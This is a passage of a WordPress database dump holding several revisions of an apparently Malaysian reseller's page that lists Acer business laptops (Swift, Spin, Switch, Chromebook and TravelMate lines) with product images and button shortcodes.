]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:36:07','2019-09-17 09:36:07','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3115,1,'2019-09-17 17:37:21','2019-09-17 09:37:21','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:37:21','2019-09-17 09:37:21','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3113,1,'2019-09-17 17:36:47','2019-09-17 09:36:47','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;&nbsp;&nbsp;&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:36:47','2019-09-17 09:36:47','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3114,1,'2019-09-18 14:22:02','2019-09-18 06:22:02','<h1>Business Product Solution</h1>\n&nbsp;\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\n\n<strong><b>Swift 7 Pro</b></strong>\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\n[maxbutton id=\"7\" ]\n&nbsp;\n&nbsp;\n&nbsp;\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\n\n<table>\n<tbody>\n<tr align=\"center\">\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\n<p style=\"text-align: center;\">Spin 1</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\n<p style=\"text-align: center;\">Spin 3</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\n<p style=\"text-align: center;\">Spin 5 Pro</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n&nbsp;\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\n\n<strong><b>Switch 12</b></strong>\n\n[maxbutton id=\"7\" ]\n\n&nbsp;\n&nbsp;\n&nbsp;\n\n<h3 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h3>\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\n\n<table>\n<tbody>\n<tr>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n</tr>\n<tr>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n</tr>\n<tr>\n<td colspan=\"3\" width=\"601\">\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<h3 class=\"fs-4 align-center margin-top-l\">TravelMate B</h3>\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\n\nTravelMate Spin B1\n\n[maxbutton id=\"7\" ]\n\n&nbsp;\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\n\n<table>\n<tbody>\n<tr>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\n<p style=\"text-align: center;\">TravelMate P2</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\n<p style=\"text-align: center;\">TravelMate P4</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\n<p style=\"text-align: center;\">TravelMate P6</p>\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\n</td>\n</tr>\n</tbody>\n</table>','Acer','','inherit','closed','closed','','1430-autosave-v1','','','2019-09-18 14:22:02','2019-09-18 06:22:02','',1430,'https://bintara.com.my/blog/2019/09/17/1430-autosave-v1/',0,'revision','',0),(3116,1,'2019-09-17 17:37:59','2019-09-17 09:37:59','<h2>Business Product Solution</h2>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" 